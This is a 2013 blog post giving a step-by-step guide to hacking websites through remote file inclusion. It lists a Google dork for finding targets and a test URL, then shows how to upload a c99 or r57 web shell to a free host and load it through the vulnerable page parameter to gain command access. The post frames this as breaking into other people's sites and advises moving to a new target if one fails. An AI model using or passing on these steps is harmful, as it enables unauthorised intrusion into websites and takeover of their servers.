Hack a website using remote
Hack a website using remote
file inclusion
Remote file inclusion is basically a one of the
most common vulnerability found in web
application. This type of vulnerability allows the
Hacker or attacker to add a remote file on the
web server. If the attacker gets successful in
performing the attack he/she will gain access to
the web server and hence can execute any
command on it.
Searching the Vulnerability
Remote File inclusion vulnerability is usually
occured in those sites which have a navigation
similar to the below one
www.Targetsite.com/index.php?
page=Anything
To find the vulnerability the hacker will most
commonly use the following Google Dork
“inurl:index.php?page=”
This will show all the pages which has
“index.php?page=” in their URL, Now to test
whether the website is vulnerable to Remote file
Inclusion or not the hacker use the following
command
www.targetsite.com/index.php?
page=www .google.com
So the hacker url will become
http://www.targetsite.com/v2/
page=http:// www.google.com
If after executing the command the homepage
of the google shows up then then the website is
vulnerable to this attack if it does not come up
then you should look for a new target. In my
case after executing the above command in the
address bar Google homepage shows up
indicating that the website is vulnerable to this
attack
Now the hacker would upload the shells to
gain access. The most common shells used are
c99 shell or r57 shell. I would use c99 shell.
The hacker would first upload the shells to a
webhosting site such
as ripway etc.
Now here is how a hacker would execute the
shells to gain access. Lets say that the url of the
shell is
http://h1.ripway.com/rahul/
Now here is how a hacker would execute the
following command to gain access
http://www.targetsite.com/v2/
page=http:// h1.ripway.com/rahul/c99.txt?
Remember to add “?” at the end of url or else
the shell will not execute. Now the hacker is
inside the website and he could do anything
with it...
https://www.facebook.com/tweakerzofuganda
posted by buznorpoor @ May 08, 2013
0 Comments
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home